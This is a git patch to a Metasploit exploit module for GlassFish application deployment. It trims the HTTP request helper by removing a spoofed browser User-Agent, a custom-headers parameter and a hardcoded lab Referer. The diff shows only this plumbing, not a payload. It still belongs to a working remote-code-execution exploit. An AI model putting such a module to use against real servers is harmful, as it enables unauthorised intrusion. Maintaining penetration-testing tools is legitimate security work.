From 445a43bd97ff0e29e7c40ce9691c25cbe4cf17cd Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Tue, 30 Aug 2016 15:56:51 -0500 Subject: [PATCH] Trim the fat --- modules/exploits/multi/http/glassfish_deployer.rb | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb index 966794b338..bf2fa9d8ba 100644 --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb @@ -63,18 +63,15 @@ class MetasploitModule < Msf::Exploit::Remote # # Send GET or POST request, and return the response # - def send_glassfish_request(path, method, session='', data=nil, ctype=nil, new_headers={}) + def send_glassfish_request(path, method, session='', data=nil, ctype=nil) headers = {} headers['Cookie'] = "JSESSIONID=#{session}" unless session.blank? headers['Content-Type'] = ctype if ctype headers['Connection'] = 'keep-alive' - headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0' headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' headers['Accept-Language'] = 'en-US,en;q=0.5' headers['Accept-Encoding'] = 'gzip, deflate, br' - headers.merge!(new_headers) unless new_headers.empty? - res = send_request_raw({ 'uri' => path, 'method' => method, @@ -622,7 +619,7 @@ class MetasploitModule < Msf::Exploit::Remote path << '&bare=false' end - res = send_glassfish_request(path, @verbs['POST'], session, post_data, ctype, {'Referer'=>'https://192.168.146.165:4848/common/applications/uploadFrame.jsf'}) + res = send_glassfish_request(path, @verbs['POST'], session, post_data, ctype) # Print upload result if res && res.code == 302